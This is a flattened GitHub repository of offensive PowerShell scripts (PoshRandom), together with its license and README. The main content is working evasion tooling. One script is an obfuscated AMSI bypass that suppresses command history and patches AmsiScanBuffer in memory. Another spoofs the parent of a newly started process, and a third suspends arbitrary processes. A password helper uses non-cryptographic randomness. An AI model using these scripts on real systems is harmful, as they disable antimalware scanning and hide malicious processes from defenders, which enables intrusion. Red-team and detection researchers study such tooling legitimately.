├── Disable-AMSI.ps1 ├── Invoke-Profiler.ps1 ├── Invoke-Rubeus.ps1 ├── Invoke-SharpHound.ps1 ├── LICENSE ├── New-Password.ps1 ├── ProcessReParent.ps1 ├── ProcessSuspendResume.ps1 └── README.md /Disable-AMSI.ps1: -------------------------------------------------------------------------------- 1 | function Disable-AMSI 2 | { 3 | Set-PSReadlineOption -HistorySaveStyle SaveNothing 4 | 5 | $AMSIBypass=@" 6 | using System; 7 | using System.Runtime.InteropServices; 8 | 9 | public class foo { 10 | 11 | [DllImport("kernel32")] 12 | public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); 13 | 14 | [DllImport("kernel32")] 15 | public static extern IntPtr LoadLibrary(string name); 16 | 17 | [DllImport("kernel32")] 18 | public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 19 | 20 | } 21 | "@ 22 | 23 | Add-Type $AMSIBypass 24 | 25 | $l = [foo]::LoadLibrary("am" + "si.dll") 26 | $a = [foo]::GetProcAddress($l, "Amsi" + "Scan" + "Buffer") 27 | $p = 0 28 | $null = [foo]::VirtualProtect($a, [uint32]5, 0x40, [ref]$p) 29 | $pa = [Byte[]] (184, 87, 0, 7, 128, 195) 30 | [System.Runtime.InteropServices.Marshal]::Copy($pa, 0, $a, 6) 31 | 32 | } -------------------------------------------------------------------------------- /Invoke-Profiler.ps1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cfalta/PoshRandom/aadf5aa791046c62d557e946526d5530dba8ffd4/Invoke-Profiler.ps1 -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2019, Christoph Falta 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /New-Password.ps1: -------------------------------------------------------------------------------- 1 | function New-Password([int]$Length) 2 | { 3 | if($Length -gt 0) 4 | { 5 | $Alphabet = @("0","1","2","3","4","5","6","7","8","9",":",";","<","=",">","?","!","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","_","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z") 6 | 7 | for($i=1;$i -le $Length;$i++) 8 | { 9 | $Password += $Alphabet | Get-Random 10 | } 11 | 12 | return($Password) 13 | } 14 | } -------------------------------------------------------------------------------- /ProcessReParent.ps1: -------------------------------------------------------------------------------- 1 | #.NET stub shamelessly copied from the great rasta-mouse https://gist.github.com/rasta-mouse/af009f49229c856dc26e3a243db185ec 2 | Add-Type -TypeDefinition @" 3 | using System; 4 | using System.Diagnostics; 5 | using System.Runtime.InteropServices; 6 | 7 | public class ProcessReparent 8 | { 9 | public static void Start(string ProcPath, int ProcID) 10 | { 11 | var startInfoEx = new Win32.STARTUPINFOEX(); 12 | var processInfo = new Win32.PROCESS_INFORMATION(); 13 | 14 | startInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(startInfoEx); 15 | 16 | var lpValue = Marshal.AllocHGlobal(IntPtr.Size); 17 | 18 | try 19 | { 20 | var processSecurity = new Win32.SECURITY_ATTRIBUTES(); 21 | var threadSecurity = new Win32.SECURITY_ATTRIBUTES(); 22 | processSecurity.nLength = Marshal.SizeOf(processSecurity); 23 | threadSecurity.nLength = Marshal.SizeOf(threadSecurity); 24 | 25 | var lpSize = IntPtr.Zero; 26 | Win32.InitializeProcThreadAttributeList(IntPtr.Zero, 2, 0, ref lpSize); 27 | startInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize); 28 | Win32.InitializeProcThreadAttributeList(startInfoEx.lpAttributeList, 2, 0, ref lpSize); 29 | 30 | var parentHandle = Process.GetProcessById(ProcID).Handle; 31 | lpValue = Marshal.AllocHGlobal(IntPtr.Size); 32 | Marshal.WriteIntPtr(lpValue, parentHandle); 33 | 34 | Win32.UpdateProcThreadAttribute( 35 | startInfoEx.lpAttributeList, 36 | 0, 37 | (IntPtr)Win32.ProcThreadAttribute.PARENT_PROCESS, 38 | lpValue, 39 | (IntPtr)IntPtr.Size, 40 | IntPtr.Zero, 41 | IntPtr.Zero 42 | ); 43 | 44 | Win32.CreateProcess( 45 | ProcPath, 46 | null, 47 | ref processSecurity, 48 | ref threadSecurity, 49 | false, 50 | Win32.CreationFlags.ExtendedStartupInfoPresent, 51 | IntPtr.Zero, 52 | null, 53 | ref startInfoEx, 54 | out processInfo 55 | ); 56 | } 57 | catch (Exception e) 58 | { 59 | Console.Error.WriteLine(e.StackTrace); 60 | } 61 | finally 62 | { 63 | Win32.DeleteProcThreadAttributeList(startInfoEx.lpAttributeList); 64 | Marshal.FreeHGlobal(startInfoEx.lpAttributeList); 65 | Marshal.FreeHGlobal(lpValue); 66 | 67 | Console.WriteLine("{0} started", processInfo.dwProcessId); 68 | } 69 | } 70 | } 71 | 72 | class Win32 73 | { 74 | [DllImport("kernel32.dll", SetLastError = true)] 75 | public static extern bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize); 76 | 77 | [DllImport("kernel32.dll", SetLastError = true)] 78 | public static extern bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize); 79 | 80 | [DllImport("kernel32.dll")] 81 | public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, CreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); 82 | 83 | [DllImport("kernel32.dll", SetLastError = true)] 84 | public static extern bool DeleteProcThreadAttributeList(IntPtr lpAttributeList); 85 | 86 | [StructLayout(LayoutKind.Sequential)] 87 | public struct PROCESS_INFORMATION 88 | { 89 | public IntPtr hProcess; 90 | public IntPtr hThread; 91 | public int dwProcessId; 92 | public int dwThreadId; 93 | } 94 | 95 | [StructLayout(LayoutKind.Sequential)] 96 | public struct STARTUPINFO 97 | { 98 | public uint cb; 99 | public IntPtr lpReserved; 100 | public IntPtr lpDesktop; 101 | public IntPtr lpTitle; 102 | public uint dwX; 103 | public uint dwY; 104 | public uint dwXSize; 105 | public uint dwYSize; 106 | public uint dwXCountChars; 107 | public uint dwYCountChars; 108 | public uint dwFillAttributes; 109 | public uint dwFlags; 110 | public ushort wShowWindow; 111 | public ushort cbReserved; 112 | public IntPtr lpReserved2; 113 | public IntPtr hStdInput; 114 | public IntPtr hStdOutput; 115 | public IntPtr hStdErr; 116 | } 117 | 118 | [StructLayout(LayoutKind.Sequential)] 119 | public struct STARTUPINFOEX 120 | { 121 | public STARTUPINFO StartupInfo; 122 | public IntPtr lpAttributeList; 123 | } 124 | 125 | [StructLayout(LayoutKind.Sequential)] 126 | public struct SECURITY_ATTRIBUTES 127 | { 128 | public int nLength; 129 | public IntPtr lpSecurityDescriptor; 130 | public int bInheritHandle; 131 | } 132 | 133 | [Flags] 134 | public enum ProcThreadAttribute : int 135 | { 136 | MITIGATION_POLICY = 0x20007, 137 | PARENT_PROCESS = 0x00020000 138 | } 139 | 140 | [Flags] 141 | public enum CreationFlags : uint 142 | { 143 | CreateSuspended = 0x00000004, 144 | DetachedProcess = 0x00000008, 145 | CreateNoWindow = 0x08000000, 146 | ExtendedStartupInfoPresent = 0x00080000 147 | } 148 | } 149 | "@ 150 | 151 | function Start-ProcessWithFakeParent { 152 | [CmdletBinding()] 153 | param ( 154 | [Parameter(Mandatory=$true)] 155 | [ValidateScript({Test-Path $_})] 156 | [string] 157 | $Path, 158 | 159 | [Parameter(Mandatory=$true)] 160 | [ValidateNotNullorEmpty()] 161 | [Alias('ID')] 162 | [string] 163 | $ParentProcess 164 | ) 165 | 166 | $isPID = $true 167 | $ProcessID = $null 168 | 169 | try { 170 | $ProcessID = [int]$ParentProcess 171 | } 172 | catch { 173 | $isPID = $false 174 | } 175 | 176 | if($isPID) 177 | { 178 | $Process = get-process -Id $ProcessID 179 | } 180 | else { 181 | $Process = get-process -Name $ParentProcess 182 | } 183 | 184 | if($Process) 185 | { 186 | if($Process.Count -gt 1) 187 | { 188 | Write-Error "Possible parents count is greater than 1. Try to use process id instead of name." 189 | } 190 | else { 191 | [ProcessReparent]::Start($Path,($Process.Id)) 192 | } 193 | } 194 | 195 | } -------------------------------------------------------------------------------- /ProcessSuspendResume.ps1: -------------------------------------------------------------------------------- 1 | Add-Type -TypeDefinition @" 2 | using System; 3 | using System.Diagnostics; 4 | using System.Runtime.InteropServices; 5 | 6 | public static class ntdll 7 | { 8 | [DllImport("ntdll.dll", PreserveSig = false)] 9 | public static extern void NtSuspendProcess(IntPtr processHandle); 10 | [DllImport("ntdll.dll", PreserveSig = false, SetLastError = true)] 11 | public static extern void NtResumeProcess(IntPtr processHandle); 12 | } 13 | public static class kernel32 14 | { 15 | [DllImport("kernel32.dll", SetLastError = true)] 16 | public static extern IntPtr OpenProcess(ProcessAccessFlags processAccess,bool bInheritHandle,int processId); 17 | [DllImport("kernel32.dll", SetLastError=true)] 18 | public static extern bool CloseHandle(IntPtr hObject); 19 | } 20 | 21 | [Flags] 22 | public enum ProcessAccessFlags : uint 23 | { 24 | All = 0x001F0FFF, 25 | Terminate = 0x00000001, 26 | CreateThread = 0x00000002, 27 | VirtualMemoryOperation = 0x00000008, 28 | VirtualMemoryRead = 0x00000010, 29 | VirtualMemoryWrite = 0x00000020, 30 | DuplicateHandle = 0x00000040, 31 | CreateProcess = 0x000000080, 32 | SetQuota = 0x00000100, 33 | SetInformation = 0x00000200, 34 | QueryInformation = 0x00000400, 35 | QueryLimitedInformation = 0x00001000, 36 | Synchronize = 0x00100000 37 | } 38 | "@ 39 | 40 | function Suspend-Process { 41 | [CmdletBinding()] 42 | param ( 43 | [Parameter(Mandatory=$true,ValueFromPipeline = $True)] 44 | [ValidateNotNullorEmpty()] 45 | [Alias('ID')] 46 | [string] 47 | $Name 48 | ) 49 | 50 | $isPID = $true 51 | $ProcessID = $null 52 | 53 | try { 54 | $ProcessID = [int]$Name 55 | } 56 | catch { 57 | $isPID = $false 58 | } 59 | 60 | if($isPID) 61 | { 62 | $Process = get-process -Id $ProcessID 63 | } 64 | else { 65 | $Process = get-process -Name $Name 66 | } 67 | 68 | if($Process) 69 | { 70 | $handle = [kernel32]::OpenProcess("ALL",$false,($Process.Id)) 71 | 72 | [ntdll]::NtSuspendProcess($handle) 73 | 74 | [kernel32]::CloseHandle($handle) 75 | } 76 | 77 | } 78 | 79 | function Resume-Process { 80 | [CmdletBinding()] 81 | param ( 82 | [Parameter(Mandatory=$true,ValueFromPipeline = $True)] 83 | [ValidateNotNullorEmpty()] 84 | [Alias('ID')] 85 | [string] 86 | $Name 87 | ) 88 | 89 | $isPID = $true 90 | $ProcessID = $null 91 | 92 | try { 93 | $ProcessID = [int]$Name 94 | } 95 | catch { 96 | $isPID = $false 97 | } 98 | 99 | if($isPID) 100 | { 101 | $Process = get-process -Id $ProcessID 102 | } 103 | else { 104 | $Process = get-process -Name $Name 105 | } 106 | 107 | if($Process) 108 | { 109 | $handle = [kernel32]::OpenProcess("ALL",$false,($Process.Id)) 110 | 111 | [ntdll]::NtResumeProcess($handle) 112 | 113 | [kernel32]::CloseHandle($handle) 114 | } 115 | 116 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PoshRandom 2 | 3 | A not-at-all-ordered compilation of random security-related powershell scripts. Things land here if I don't know where else to put them ;-) 4 | 5 | Here's a snapshot of what's in there at the moment: 6 | 7 | * __Disable-AMSI:__ function to disable AMSI for the current process 8 | * __Invoke-Rubeus:__ powershell wrapper for Ghostpack Rubeus by @harmj0y 9 | * __Invoke-Profiler:__ an old AD Recon tool. Propably doesn't work any more - work in progress 10 | * __ProcessReparent:__ contains "Start-ProcessWithFakeParent", which allows you to fake the parent process on a new process you start. Shamelessly copied from the great rasta-mouse. 11 | * __ProcessSuspendResume:__ allows you to invoke "Suspend-Process" and "Resume-Process" (like Process Explorer does to suspend a process) --------------------------------------------------------------------------------